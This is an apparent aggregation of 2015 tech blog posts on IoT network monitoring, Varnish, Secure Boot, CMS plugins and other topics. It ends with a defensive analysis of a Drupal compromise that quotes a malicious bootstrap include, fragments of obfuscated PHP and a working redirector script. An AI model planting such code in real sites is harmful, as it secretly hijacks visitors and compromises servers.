But today, more and more devices are connected (think about the IoT buzz – "Internet of Things"). These devices are manufactured in a way that they automatically use any available network connectivity. Configure a wireless network and they are good to go. Classic home networks are based on xDSL or cable modems which provide basic network services (DHCP, DNS). This is not the best way to protect your data: they lack egress filters, and any connected device has full network connectivity and can potentially exfiltrate juicy data. That's why I argue in favour of a documentation template describing the resources required to operate such "smart" devices smoothly. Here is a good example. I have a Nest thermostat installed at home and it constantly connects to the following destinations:

54.227.140.192:9543
23.21.241.75:443
23.23.91.51:80
54.243.35.110:443
87.106.208.187:80

It’s easy to make your home network safer without spending a lot of time and money. When a new device is connected to my network, it receives a temporary IP address from a small DHCP pool (Ex: 192.168.0.200-210). This pool has a very limited network connectivity. It uses a local DNS resolver (to track used domains) and is only allowed to communicate over HTTPS to the Internet. A Snort IDS and a tcpdump are constantly running to capture and inspect all packets generated by the IP addresses from the DHCP pool. This is easy to configure with the following shell script running in the backgound.

#!/bin/bash
# Capture a full day of traffic from the quarantine DHCP pool into a dated
# pcap file, compress it, and start over.
while true
do
    TODAY=`/bin/date +"%Y%m%d"`
    /usr/sbin/tcpdump -i eth1 -lenx -X -s 0 -w /data/pcaps/tcpdump-$TODAY.pcap \
        host 192.168.0.200 or \
             192.168.0.201 or \
             192.168.0.202 or \
             192.168.0.203 or \
             192.168.0.204 or \
             192.168.0.206 or \
             192.168.0.207 or \
             192.168.0.208 or \
             192.168.0.209 or \
             192.168.0.210 &
    TCPDUMP_PID=$!
    sleep 86400 # Go to sleep for one day
    kill $TCPDUMP_PID
    gzip -9 /data/pcaps/tcpdump-$TODAY.pcap
done

When a new device is connected, its traffic is automatically captured and can be analyzed later. Once the analysis is complete, a static DHCP lease is configured with the device's MAC address and the firewall policy is adapted to permit the required traffic. Not only does this help to secure your network, it can also reveal interesting behaviors.
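
To make that "very limited network connectivity" concrete, here is a minimal sketch of such an egress policy (my own illustration; the forwarding interface, resolver address and exact rules are assumptions, not from this post):

# Quarantine pool 192.168.0.200-210: allow DNS to the local resolver and
# outbound HTTPS, drop everything else.
iptables -N QUARANTINE
iptables -A FORWARD -m iprange --src-range 192.168.0.200-192.168.0.210 -j QUARANTINE
iptables -A QUARANTINE -p udp --dport 53 -d 192.168.0.1 -j ACCEPT
iptables -A QUARANTINE -p tcp --dport 443 -j ACCEPT
iptables -A QUARANTINE -j DROP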

by Xavier at March 17, 2015 07:29 AM

March 16, 2015

Mattias Geniar

Forthcoming OpenSSL releases

Let's hope this isn't as bad as it sounds.

Forthcoming OpenSSL releases
============================

The OpenSSL project team would like to announce the forthcoming release
of OpenSSL versions 1.0.2a, 1.0.1m, 1.0.0r and 0.9.8zf.

These releases will be made available on 19th March. They will fix a
number of security defects. The highest severity defect fixed by these
releases is classified as "high" severity.

Yours

The OpenSSL Project Team

The good news is, OpenSSL isn't dead. The bad news is, we may have a new heartbleed on our hands.

The post Forthcoming OpenSSL releases appeared first on ma.ttias.be.

by Mattias Geniar at March 16, 2015 10:09 PM

Lionel Dricot

I don't want to drive anymore!

OK, let me drive...

I don't want to drive anymore because I feel like I'm wasting my time. While driving, I can neither read, nor write, nor admire, nor breathe, nor dream, nor unwind, nor love, nor give pleasure, nor enjoy myself. An hour and a half of driving per day, and you get there faster than you think, represents a sacrifice of 10% of our waking time, 10% of our life.

I don't want to drive anymore because driving is morbid. Sitting, unable to move, my muscles atrophy, contract, stiffen. The position forces my lungs to close up. In any case, all I breathe is the exhaust of those ahead of me. You only have to see the colour snow takes on at the side of a road to realise that our lungs do the same. At bottom, driving is not far removed from physical torture.

I don't want to drive anymore because I don't like constantly putting my life at risk. Hurtling along in a metal missile at insane speeds, my mind has to stay permanently alert, on the lookout. I have to predict the erratic behaviour of other drivers, anticipate difficult conditions. My life is at stake! If I forget that and relax, lulled by the routine of a daily commute and confidence in my own skill, I'm merely ignoring a danger made worse by my carelessness. And I turn into a potential criminal…

I don't want to drive anymore because I no longer want to support the veritable cult that now surrounds the automobile. From a utility it has become a religion. Manufacturers make cars shiny and deliberately fragile. Liturgical worship takes place at the big annual motor shows and in everyday conversation. Brush against a parked car and it will scream; leave a scratch on it, however faint and unintentional, and you become a public enemy, a hated and hunted criminal. Merely criticising the automobile god makes me a pariah.

I don't want to drive anymore because our whole society is at the automobile's command. All our landscapes are entirely adapted to driving. Our roads no longer serve our houses; our houses serve the roads. Monstrous concrete arches rise around our cities and across the countryside. A continuous rumble roars and deafens. Nobody would dare block car traffic for even a few minutes, while in the same place it is not unusual to leave pavements or cycle paths obstructed for months, forcing non-motorists to risk their lives. It's quite simple: cycling to work takes me more kilometres than driving there, because the most direct fast roads are strictly reserved for cars.

I don't want to drive anymore because the automobile has become a war. I have seen too many sacrifices, too many young lives cut down. The people I have known who died before turning 50 were, in their immense majority, killed by the automobile. Some who did not die were left disabled for life. Even today, sometimes many years later, I regularly relive those terrible seconds when I learned of the death of a loved one, an acquaintance or a passing contact. I remain deeply shocked by the violent suddenness of these injustices. All the while knowing that I could well be the next victim, or the next killer.

I don't want to drive anymore because when I see young people full of life squander their first salary on a car, when I see them rev their engines and screech their tyres, I know that one day they will turn against us, that they will show us their wounds, their dead, their battered earth, and say: "Why did you teach us this religion? Why did you let us do it? Why did you delay every innovation that would have let us get rid of the automobile? Was the car industry worth even one of our lives?".

I don't want to drive anymore because I know my descendants will look at me as a criminal and say, "All that, just to get around?". And they will be right.

 

Photo by F Mira. Suggested reading: La proclamation, L'inauguration du RER, La voiture, 1er front de la guerre à l'innovation.

Thank you for taking the time to read this freely priced post. Feel free to support me with a few milliBitcoins, a handful of euros, or by following me on Tipeee, Twitter, Google+ and Facebook!

This text is published by Lionel Dricot under the CC-By BE licence.


by Lionel Dricot at March 16, 2015 04:04 PM

March 15, 2015

Mattias Geniar

Running Varnish 4.x on systemd

If you're thinking about running Varnish 4.x on a systemd system, you may be surprised that many of your "older" configs no longer work.

Now I don't mean the actual VCL files; those have a seriously changed syntax and there is proper documentation on handling a 3.x to 4.x upgrade.

I mean the /etc/sysconfig/varnish config, which no longer works in a systemd world. It's been replaced by an /etc/varnish/varnish.params file, which is included by systemd.

To see what's going on under the hood, check out the systemd configuration file at /usr/lib/systemd/system/varnish.service.

$ cat /usr/lib/systemd/system/varnish.service
[Unit]
Description=Varnish a high-perfomance HTTP accelerator
After=syslog.target network.target

[Service]
# Maximum number of open files (for ulimit -n)
LimitNOFILE=131072

# Locked shared memory (for ulimit -l)
# Default log size is 82MB + header
LimitMEMLOCK=82000

# Maximum size of the corefile.
LimitCORE=infinity

EnvironmentFile=/etc/varnish/varnish.params

Type=forking
PIDFile=/var/run/varnish.pid
PrivateTmp=true
ExecStartPre=/usr/sbin/varnishd -C -f $VARNISH_VCL_CONF
ExecStart=/usr/sbin/varnishd \
	-P /var/run/varnish.pid \
	-f $VARNISH_VCL_CONF \
	-a ${VARNISH_LISTEN_ADDRESS}:${VARNISH_LISTEN_PORT} \
	-T ${VARNISH_ADMIN_LISTEN_ADDRESS}:${VARNISH_ADMIN_LISTEN_PORT} \
	-t $VARNISH_TTL \
	-u $VARNISH_USER \
	-g $VARNISH_GROUP \
	-S $VARNISH_SECRET_FILE \
	-s $VARNISH_STORAGE \
	$DAEMON_OPTS

ExecReload=/usr/sbin/varnish_reload_vcl

[Install]
WantedBy=multi-user.target

Most importantly, it loads the file /etc/varnish/varnish.params, which can/should contain environment variables that you can use to manipulate the systemd service.

At the very end, it contains the $DAEMON_OPTS variable. Previous sysconfig files would have that contain the entire set of startup parameters for varnish, including the -a parameter (what port to listen on), -S (the secret file), ... etc. With the Varnish 4.x configs on systemd, $DAEMON_OPTS should only contain the additional parameters that aren't already specified in the varnish.service file.

For example, you should limit the varnish.params file to something like this.

$ cat /etc/varnish/varnish.params
# Varnish environment configuration description. This was derived from
# the old style sysconfig/defaults settings
RELOAD_VCL=1
VARNISH_VCL_CONF=/etc/varnish/default.vcl
VARNISH_LISTEN_PORT=80
VARNISH_ADMIN_LISTEN_ADDRESS=127.0.0.1
VARNISH_ADMIN_LISTEN_PORT=6082
VARNISH_SECRET_FILE=/etc/varnish/secret
VARNISH_STORAGE="file,/var/lib/varnish/varnish_storage.bin,1G"
VARNISH_TTL=120
VARNISH_USER=varnish
VARNISH_GROUP=varnish
#DAEMON_OPTS="-p thread_pool_min=5 -p thread_pool_max=500 -p thread_pool_timeout=300"

If you're migrating from a sysconfig-world, one of the most important changes is that the systemd-config requires a user and group environment variable, which wasn't set previously.

$ cat /etc/varnish/varnish.params
...
VARNISH_USER=varnish
VARNISH_GROUP=varnish
...

For all other changed parameters in the $DAEMON_OPTS list, check out the Varnish man pages (man varnishd), which contain very accurate documentation on which parameters are allowed and which have changed.
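
One practical note from my side (not in the original post): varnish.params is read at service start, but if you edit the unit file itself, systemd needs to re-read it before a restart picks up the change:

$ systemctl daemon-reload
$ systemctl restart varnish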

The post Running Varnish 4.x on systemd appeared first on ma.ttias.be.

by Mattias Geniar at March 15, 2015 08:26 PM

Debug Varnish 4.x on systemd That Fails to Start

The post Debug Varnish 4.x on systemd That Fails to Start appeared first on ma.ttias.be.

So you're stuck at systemctl start varnish, now what?

Well, by default, systemd won't tell you much.

$ systemctl start varnish
Job for varnish.service failed. See 'systemctl status varnish.service' and 'journalctl -xn' for details.

View the status of the service:

$  systemctl status varnish
varnish.service - Varnish a high-perfomance HTTP accelerator
   Loaded: loaded (/usr/lib/systemd/system/varnish.service; enabled)
   Active: failed (Result: exit-code) since Sun 2015-03-15 21:07:41 CET; 15s ago
  Process: 10062 ExecStart=/usr/sbin/varnishd -P /var/run/varnish.pid -f $VARNISH_VCL_CONF -a ${VARNISH_LISTEN_ADDRESS}:${VARNISH_LISTEN_PORT} -T ${VARNISH_ADMIN_LISTEN_ADDRESS}:${VARNISH_ADMIN_LISTEN_PORT} -t $VARNISH_TTL -u $VARNISH_USER -g $VARNISH_GROUP -S $VARNISH_SECRET_FILE -s $VARNISH_STORAGE $DAEMON_OPTS (code=exited, status=2)
  Process: 10049 ExecStartPre=/usr/sbin/varnishd -C -f $VARNISH_VCL_CONF (code=exited, status=0/SUCCESS)
 Main PID: 6187 (code=exited, status=0/SUCCESS)

site.be varnishd[10049]: .miss_func = VGC_function_vcl_miss,
site.be varnishd[10049]: .hit_func = VGC_function_vcl_hit,
site.be varnishd[10049]: .deliver_func = VGC_function_vcl_deliver,
site.be varnishd[10049]: .synth_func = VGC_function_vcl_synth,
site.be varnishd[10049]: .backend_fetch_func = VGC_function_vcl_backend_fetch,
site.be varnishd[10049]: .backend_response_func = VGC_function_vcl_backend_response,
site.be varnishd[10049]: .backend_error_func = VGC_function_vcl_backend_error,
site.be varnishd[10049]: .init_func = VGC_function_vcl_init,
site.be varnishd[10049]: .fini_func = VGC_function_vcl_fini,
site.be varnishd[10049]: };

It'll show the message that Varnish failed to start, and it will show the last 10 lines of output the program sent to stdout/stderr. But in Varnish's case, that's just the compiled VCL and it won't actually tell you the error.

To start, test the syntax of your Varnish 4 VCL file.

$ varnishd -d -f /etc/varnish/default.vcl
...
-----------------------------
Varnish Cache CLI 1.0
-----------------------------
...

If you see a "Varnish Cache CLI", your VCL compiled and is working. That means the problem could be in the way systemd starts its service.

$ grep systemd /var/log/messages
Mar 15 21:07:41 lb01 systemd: Starting Varnish a high-perfomance HTTP accelerator...
Mar 15 21:07:41 lb01 systemd: varnish.service: control process exited, code=exited status=2
Mar 15 21:07:41 lb01 systemd: Failed to start Varnish a high-perfomance HTTP accelerator.
Mar 15 21:07:41 lb01 systemd: Unit varnish.service entered failed state.

So in this case, systemd failed to start the service with my requested parameters. Check your varnish.service in /usr/lib/systemd/system/varnish.service file for any typos or mis-configured environment variables and try again!
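
As an aside (not part of the original post), the same startup errors can be pulled straight from the journal instead of grepping /var/log/messages:

$ journalctl -u varnish.service -n 50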

The post Debug Varnish 4.x on systemd That Fails to Start appeared first on ma.ttias.be.

by Mattias Geniar at March 15, 2015 08:14 PM

March 13, 2015

Wim Coekaerts

Secure Boot support with Oracle Linux 7.1

Update: as my PM team pointed out to me - it's listed as Tech Preview for OL7.1, not GA/production, in the release notes - just making sure I add this disclaimer ;)

Another feature introduced with Oracle Linux 7.1 is support for Secure Boot.

If Secure Boot is enabled on a system (typically desktop, but in some cases also servers) - the system can have an embedded certificate (in firmware). This certificate can be one that's uploaded to the system by the admin or it could be one provided by the OEM/OS vendor. In many cases, in particular newer desktops, the system already contains the Microsoft key. (there can be more than one certificate uploaded...). When the firmware loads the boot loader, it verifies/checks the signature of this bootloader with the key stored in firmware before continuing. This signed bootloader (at this point trusted to continue) will then load a signed kernel, or signed second stage boot loader and verify it before starting and continuing the boot process. This creates what is called a chain of trust through the boot process.

We ship a 1st stage bootloader with Oracle Linux 7.1 which is a tiny "shim" layer that is signed by both Microsoft and Oracle. So if a system comes with Secure Boot support and already ships the Microsoft PK, the shim layer will be started and verified, and if it passes verification, it will then load grub2 (the real bootloader). grub2 is signed by us (Oracle). The signed/verified shim layer contains the Oracle key and will validate that grub2 is ours (signed); if verification passes, grub2 will load the Oracle Linux kernel, and the same process takes place: our kernel is signed by us (Oracle) and grub2 will validate the signature prior to allowing execution of the kernel. Once the kernel is running, all kernel modules that we ship as part of Oracle Linux, whether standard kernel modules included in the kernel RPM or external kernel modules used with Oracle Ksplice, are also signed by Oracle, and the kernel will validate the signature prior to loading these kernel modules.

Enabling loading and verification of signed kernel modules is done by adding enforcemodulesig=1 to the grub kernel option line. In enforcing mode, any kernel module that is not signed by Oracle will fail to load.
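
As an illustration of how that option could be added on a grub2-based install (a sketch, not from the original post; grubby normally ships with Oracle Linux 7, and you can equally edit GRUB_CMDLINE_LINUX in /etc/default/grub and regenerate the config):

# grubby --update-kernel=ALL --args="enforcemodulesig=1"
# reboot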

If a system has Secure Boot support but a sysadmin wants to use the Oracle signature instead, we will make our certificate available to be downloaded securely from Oracle and then this can be uploaded into the firmware key database.

by Wcoekaer-Oracle at March 13, 2015 06:04 PM

Wouter Verhelst

New toy: Fujitsu Lifebook e734

My Lenovo x220, which I've owned for almost four years now (I remember fetching it from the supplier shortly before driving off to Banja Luka), was getting somewhat worn out. The keyboard and the screen had both been replaced at some point already, and the wwan interface had given up as well. The case was all cracked, and the NIC connector wasn't doing very well anymore either; there have been a few cases of me trying to configure the wireless network at a customer, which was harder than it needed to be because the NIC would only work if I put in the network cable just so, and would drop out if someone so much as dropped a piece of paper onto the cable.

In other words, it was time for a new one. At first I wanted to buy a Lenovo x250, but then I noticed that the Fujitsu came with an i7 4712MQ, which I liked (as today it is still quite exceptional for an ultrabook to have a quadcore processor). Fujitsu also claims up to 9 hours of battery life, but it's not clear to me whether this is supposed to be the case with the default battery only. They also have a battery for the modular bay, which I bought as well (to replace the optical drive which I sometimes use, but only rarely), and on top of that it came with a free port replicator.

Not all is well, however. In the x220, getting the WWAN interface to work involved some creative use of chat against /dev/ttyACM0 wherein I issue a few AT commands to put the WWAN interface into a particular mode, and from then on the WWAN interface is just a regular Ethernet interface on which I can do DHCP. The new laptop has a "Sierra Wireless, Inc." WWAN interface (USB id 1199:9041) which annoyingly doesn't seem to expose the ttyACM (or similar) devices, and I'm not sure what to use instead. Just trying to do DHCP doesn't work -- yes, I tried.
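
For reference, the kind of incantation that did the trick on the x220 looked roughly like the sketch below; the exact AT commands depend on the modem and the provider's APN (the APN and interface name shown are placeholders), so treat this as an illustration rather than a recipe:

$ chat -v '' 'AT+CFUN=1' OK 'AT+CGDCONT=1,"IP","apn.example"' OK '' \
    < /dev/ttyACM0 > /dev/ttyACM0
$ dhclient wwan0

The new Sierra Wireless device doesn't expose such a control tty, so this approach no longer applies as-is.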

Unfortunately, the keyboard isn't very good; it's of the bubble gum type, and I keep getting annoyed at it not picking up my keystrokes all the time. When I'm at home or at my main customer, I have a Das Keyboard Ultimate S (3rd (customer) and 4th (home) generation), so it's only a problem when I'm not at home, but it's still extremely annoying. There is a "backlight" function in that keyboard, but that's not something I think I'll ever use (hint: "das keyboard ultimate s").

The display can't do more than 1366x768, which is completely and utterly wrong for a computer -- but it's the same thing as my x220, so it's not really a regression.

The "brightness" ACPI keys don't seem to work. I may have to fiddle with some ACPI settings at some point, I suppose, but it's not a major problem.

When I plugged it in, I noticed that fdpowermon ignored the second battery. I had originally written fdpowermon with support for such a second battery, but as my x220 had only one, I never tested it. Apparently there was a bug, but that's been fixed now -- at least in unstable.

On the good side of the equation, it has three USB3 ports in the laptop, and four in the port replicator, with no USB2; this is a major leap forwards from the one USB3 and six USB2 in the x220. A positive surprise was the CCID smartcard reader that I somehow missed while reading the specs, but which -- given my current major customer -- is very welcome indeed.

Update: After having used it a few days, there were a few minor annoyances:

March 13, 2015 04:30 PM

Xavier Mertens

Expanding your CMS at your own risk!

CMS or “Content Management Systems” have become very common over the past few years. Popular CMS are WordPress, Drupal or Joomla. You can rent some space at a hosting provider for a few bucks or even find free hosting platforms. You can deploy them in a few minutes on your own server. Then, you just have to focus on the content: no need to learn CSS/HTML!

For me, modern CMS have a common point with cars: their owners like to customize them. “Car tuning” is very popular: it is the modification of the performance or appearance of a vehicle. Millions of people like to modify their cars, and there is a huge business driven by car tuning.

We can make a rough comparison between cars and CMS. Your CMS can also be tuned. Most CMS offer a way to extend the features or the look’n’feel via plugins (or add-ons or extensions – whatever you name them). Some examples of common plugins:

I won’t discuss the look’n’feel of websites. Some plugins can completely revamp a website, and tastes and colours differ. But let’s focus on security. Car engine performance can be modified by adding or reprogramming chips. It’s easy and cheap to gain some horsepower, but this can have a huge safety impact. Want an example? Brakes or suspensions are designed to stop and keep on the road a car with a set of known specifications (weight, power), but if you change one parameter, this can have a big impact on you and your passengers’ safety. A Ferrari and a Renault Megane don’t have the same brakes. It’s exactly the same with CMS plugins: they can alter your CMS security.

While most CMS source code is regularly audited and well maintained, the same is not true for plugins. By definition, a plugin is a piece of code that adds a specific feature to an existing application. Keep in mind: by using plugins, you change the way the original software behaves. And not all plugins are developed by skilled developers or with security in mind. Today, most vulnerabilities reported in CMS environments are due to… plugins! Here are some tips to increase your CMS security.

  1. Only install plugins that you really need.
  2. Some plugins can be configured. Always review the default settings and adapt them to your environment and security requirements.
  3. If you decide not to use a plugin, disable it and uninstall it completely.
  4. Do NOT rely on a plugin's popularity. The fact that it is used by many webmasters does not make it safe! On the contrary, it may be an attractive target to compromise more sites.
  5. Like any piece of software, keep them updated (see the WP-CLI sketch below).
  6. Take a deep breath and jump into the code to have a quick code review (any backdoor installed?)
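
For WordPress specifically, points 3 and 5 are easy to script with WP-CLI, assuming it is installed on the server (a sketch; the plugin slug in the last line is just a placeholder):

$ wp plugin list --fields=name,status,update,version
$ wp plugin update --all
$ wp plugin deactivate some-unused-plugin && wp plugin delete some-unused-plugin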

Also, keep in mind that installed plugins can be listed by scanners and crawlers. WordPress has a hardening guide with good recommendations.

by Xavier at March 13, 2015 09:53 AM

Wim Coekaerts

Oracle Linux 7.1 and MySQL 5.6

Yesterday we released Oracle Linux 7 update 1. The individual RPM updates are available from both public-yum (our free, open, public yum repo site) and Oracle Linux Network. The install ISOs can be downloaded from My Oracle Support right away and the public downloadable ISOs will be made available in the next few days from the usual e-delivery site. The ISOs will also, as usual, be mirrored to other mirror sites that also make Oracle Linux freely available.

One update in Oracle Linux 7 Update 1 that I wanted to point out is the convenience of upgrading to MySQL 5.6 at install time. Oracle Linux 7 GA includes MariaDB 5.5 (due to our compatibility commitment in terms of shipping the exact same packages) and we added MySQL 5.6 RPMs on the ISO image (and in the yum repo channels online). So while it was easy for someone to download and upgrade from MariaDB 5.5 to MySQL 5.6, there was no install option. Now with 7.1 we included an installation option for MySQL. So you can decide which database to install in the installer or through kickstart with @mariadb or @mysql as a group. Again, MariaDB 5.5 is also part of Oracle Linux 7.1 and any users that are looking for strict package compatibility will see that we very much provide that. All we have done is make it easy to have a better alternative option (1) conveniently available and integrated (2) without any compatibility risks whatsoever, so you can easily run the real standard that is MySQL. A bug fix, if you will.
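
A minimal kickstart fragment showing where that group selection would go (a sketch; only the @mysql group name comes from the post, the rest is generic kickstart):

%packages
@core
@mysql
%end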

I have a little screenshot available here.

Enjoy.

by Wcoekaer-Oracle at March 13, 2015 03:47 AM

March 12, 2015

Frank Goossens

Music from Our Tube: The Bad Plus covering Aphex Twin’s Flim

Didn’t know this nice jazz-tune was an Aphex Twin cover, but it sure is. Anyway, here’s the cover (and then some more) by The Bad Plus, live:

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at March 12, 2015 05:42 PM

March 10, 2015

Dries Buytaert

The Big Reverse of the Web

I believe that for the web to reach its full potential, it will go through a massive re-architecture and re-platforming in the next decade. The current web is "pull-based", meaning we visit websites or download mobile applications. The future of the web is "push-based", meaning the web will be coming to us. In the next 10 years, we will witness a transformation from a pull-based web to a push-based web. When this "Big Reverse" is complete, the web will disappear into the background much like our electricity or water supply. We'll forget what 'www' stood for (which was kind of dumb to begin with). These are bold statements, I understand, but let me explain why.

In the future, content, products and services will find you, rather than you having to find them. Puma will let us know when to replace our shoes, and Marriott will automatically present us with room options if we miss our connecting flight. Instead of visiting a website, we will proactively be notified of what is relevant and asked to take action. The dominant function of the web will be to let us know what is happening or what is relevant, rather than us having to find out.

Facebook and Flipboard are early examples of what such a push-based experience looks like. Facebook "pushes" a stream of personalized information designed to tell you what is happening with your friends and family; you no longer have to "pull" them and ask how they are doing. Flipboard changes how we consume content by aggregating the best of the web and filtering it based on our interests; it "pushes" the relevant and interesting content to you rather than you having to "pull" the news from multiple sources. Also consider the rise of notification-centric experiences; your smartphone's notification center provides you with a stream of relevant information that is pushed to you. More recently, these notifications have become interactive; you can check in for a flight without having to open your travel app. You can buy a product without having to visit their website.

What people really want is to tune into information rather than having to work to get information. It saves them time and effort and in the long run, an improved user experience always wins. In most cases, "Show me what I want" is more useful than "Let me search around and see what I can find".

With some imagination, it's not too hard to picture how these kinds of experiences could expand to other areas of the web. The way e-commerce works today is really no different than having to visit a lot of separate physical stores or wading through hundreds of products in a department store. We shouldn't have to work so hard to find what we want. In a push-based world, we would sit back as if we were watching a fashion show -- the clothing presented could come from hundreds of different online brands, but the stream is "personalized" to our needs, budget, sizes and style preferences. When the Big Reverse is complete, it will be the end of department stores and malls. Keep an eye on personalized clothing services like Trunk Club or Stitch Fix.

Ten years from now we're going to look back and recognize that search-based content discovery was broken. Today the burden is put on the user to find relevant content, either by directly typing in a URL or by crafting complex search queries. While pull-based experiences might not go away, push-based experiences will dominate, as they will prove to be much more efficient.

Many of you won't like it (at first), but push will win over pull. Healthcare is going through a similar transformation from pull to push; instead of going to a doctor, we'll have web-enabled hardware and software that is able to self-diagnose. Wearables like activity trackers are just the start of decades of innovation and opportunity in healthcare. Helped by the web, education is also moving from pull to push. Why go to a classroom when personalized training can come to you?

We are at the beginning of a transition bridging two distinctly different types of economies. First, a "push economy" that tries to anticipate consumer demand, creates standardized or generic products in large amounts, and "pushes" them into the market via global distribution channels and marketing. Now, a "pull economy" that—rather than creating standardized products—will create highly customized products and services produced on-demand and delivered to consumers through one-on-one relationships and truly personal experiences.

This new paradigm could be a very dramatic shift that disrupts many existing business models: advertising, search engines, app stores, online and offline retailers, and much more. For middlemen like online retailers or search engines, the push-based model means they risk being disintermediated as the distribution chain becomes less useful. It marks a powerful transformation that dematerializes and de-monetizes much of the current web. While this might complicate the lives of many organizations, it will undoubtedly simplify and better the lives of consumers everywhere.

by Dries at March 10, 2015 10:08 AM

Frank Goossens

QuirksMode: “The problem with Angular”

I’ve previously already expressed my doubts about how well-suited AngularJS is for mobile web development (in Dutch, though, as I was discussing the merits of the mobile news site of the Flemish broadcaster VRT).

QuirksMode’s PPK dove a lot deeper in his “The problem with Angular”, stating amongst other things:

Angular is aimed at corporate IT departments rather than front-enders, many of whom are turned off by its peculiar coding style, its emulation of an HTML templating system that belongs on the server instead of in the browser, and its serious and fundamental performance issues. I’d say Angular is mostly being used by people from a Java background because its coding style is aimed at them. Unfortunately they aren’t trained to recognize Angular’s performance problems.

The performance problems PPK mentions are not the initial download of angular.js in the browser (which is one of the reasons why I dislike it), but the fact that angular.js does a huge amount of DOM-manipulations, which are costly, especially on mobile. This quote says it all;

Although templating is the correct solution, doing it in the browser is fundamentally wrong. The cost of application maintenance should not be offloaded onto all their users’s browsers — especially not the mobile ones. This job belongs on the server.

But do read PPK’s article for more insights on Angular and the road it is heading down with AngularJS 2.0!

by frank at March 10, 2015 09:26 AM

Mattias Geniar

Virtual Reality As The Next Step After Responsive Webdesign?

The post Virtual Reality As The Next Step After Responsive Webdesign? appeared first on ma.ttias.be.

Mozilla has an impressive demo site running at MozVR.com.

Over the last few years, the web has evolved from a static, fixed-width environment to fully responsive design. What if the next step is Virtual Reality, ported to the web browser?

It requires VR hardware (Oculus Rift, Google Cardboard, Sony's Project Morpheus, ...), which hardly anyone has. And it requires Firefox Nightly, which is easier to get.

If those conditions aren't met, the site and its demos won't work.

mozvr_firefox_vr_oculus

But the site offers a whole lot more than just the demos: it features an active blog and some impressive WebGL based Virtual Reality demos that work even without the Oculus.

mozvr_sechelt_demo

There's even a demo available for use with the Leap Motion.

What if, in 5 to 10 years from now, we'll consider Responsive Webdesign a thing of the past and Virtual or Augmented Reality is the new hype?

The current hardware for Virtual Reality is bulky, low-res and has a high latency. But if technology has taught us one thing, it's that hardware gets smaller, faster and cheaper. In the not-so-distant future, Virtual Reality hardware could be as common as wearing contact lenses or normal glasses.

Imagine the visualisations possible with VR. Complex data structures that now use d3js can be viewed in a full 360 degree view. Website navigations and controls can be outside of the normal view and used by tilting your head or viewing left/right. Depth can be used to zoom-in to a website.

What if Virtual Reality really is the future of the web?

The post Virtual Reality As The Next Step After Responsive Webdesign? appeared first on ma.ttias.be.

by Mattias Geniar at March 10, 2015 07:50 AM

March 09, 2015

Mattias Geniar

Drupal engine_ssid_ And engine_ssl_ cookies: You’ve Been Hacked

The post Drupal engine_ssid_ And engine_ssl_ cookies: You’ve Been Hacked appeared first on ma.ttias.be.

If you're seeing the cookies engine_ssid_ and engine_ssl_ being set in your Drupal site, chances are your Drupal installation has been hacked.

Detecting the hack

If you open your Inspector tab in Chrome/Firefox, you can see the following cookies set for your site.

drupal_engine_ssid_cookies

The value of the engine_ssid_ cookie is always ieuakakai_$timestamp, so a random value for every visitor. You're most likely finding these cookies because you're investigating a caching issue where your cache hit rates are dropping. This cookie is the cause, as it sets a unique timestamp for every visitor.

Finding the infected files on the filesystem

My investigations have, on numerous installations, always led to the directory misc/farbtastic/, where new PHP files were being dropped. Farbtastic is supposed to be the jQuery Color Picker, so you wouldn't expect PHP files in here -- right?

$ ls -alh misc/farbtastic/*.php
-rw-r--r-- 1 user group 100K misc/farbtastic/cache.php
-rw-r--r-- 1 user group 297  misc/farbtastic/leftpanelsin.php

The content of those files is what you would expect: typical obfuscated PHP code.

$ more misc/farbtastic/cache.php
<?php $GLOBALS['_1850119110_']=Array(base64_decode('ZXJyb3JfcmV' .'wb3J0a' .'W' .'5n'),base64_decode('c3' .'RyX3Jlc' .'Gx' .'hY2U='),base
...

This piece of PHP code can do harm in 2 ways: either it's included in the Drupal codebase, calling it on every page load, or it's loaded as an AJAX request in the browser. This particular piece of infection is the former: it gets included in the bootstrap of Drupal, so it's present on every request made to the server.

$ more includes/bootstrap.inc
...
**
* First bootstrap phase: initialize configuration.
*/@include_once( DRUPAL_ROOT . '/misc/farbtastic/cache.php');
define('DRUPAL_BOOTSTRAP_CONFIGURATION', 0);

The Drupal bootstrap is what actually initialises the entire Drupal stack. By injecting it in there, this malware can be sure it's present on every PHP request processed by Drupal.

There should be actual bonus points awarded to this malware for adhering to the Drupal Coding Standards for its use of spaces and concatenation, although it's probably just a means for blending in better and staying hidden in the bootstrap file.

Update 12/3/2015, thanks to Dimitri in the comments.

There's also an infection in the includes/refresh.inc file, with more obfuscated code.

$ more includes/refresh.inc
...
$GLOBALS['_2008785826_']=Array(base64_decode('Z' .'XJ' .'yb' .'3' .'J' .'f' .'c' .'mVwb3J0' .'a' .'W5n'),base64_decode
...

What does it do?

Besides dropping in cookies that can mess with your caching strategy, this infection can do quite a bit more. After all, just busting caches everywhere may be fun, but that doesn't get you anywhere.

There are 2 parts to this infection. One is a simple redirector in the form of leftpanelsin.php, which I've prettified here.

$ more misc/farbtastic/leftpanelsin.php
<?php
if( $_REQUEST["q"] == "pharmacy") {
   header("Location: http://www.-removed-url-.com/?refid=xx&trackid=xx&q=". $_REQUEST["q"], true, 302);
}
else {
   header("Location: http://www.-removed-url-.com/catalog/Bestsellers/". $_REQUEST["q"] .".htm?refid=xx&trackid=xx&q=". $_REQUEST["q"], true, 302);
}
exit;
?>

The sole purpose of this file is to be called directly via the browser, most likely through either a javascript <script> injection or an iframe. It'll redirect the browser/visitor to an affiliate site.

The more complicated piece of code is the cache.php file. You can find the original cache.php version here.

Farbtastic Drupal Hack

An attempt to deobfuscate the code can be found here.

Farbtastic Drupal Hack Deobfuscated

In both cases, it's still entirely unreadable. Someone went to great lengths to hide the true purpose of this script. No simple de-obfuscator can decode this; it would require a tremendous amount of work to get a readable version.

It is filled with $GLOBALS, random function names, math, arrays, ... Honestly, that anything comes out of it at all is a victory on its own.

Finding The Source

How did it get there? Most likely an out-of-date plugin. Or maybe Drupalgeddon. Judging by the timestamps of most of the infected files, this isn't a new breach. But it's something that appears to have been kept quiet.

As far as I could tell, the only way to spot it was the new cookies included on the site. No signs of abuse could be found anywhere in the access or mail logs.
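
If you want to check your own installations for this particular variant, a rough sweep based on the file names and patterns described above could look like this (a sketch, not an exhaustive detector):

$ find misc/farbtastic/ -name '*.php'
$ grep -n 'farbtastic/cache.php' includes/bootstrap.inc
$ grep -rln 'base64_decode' includes/ | head

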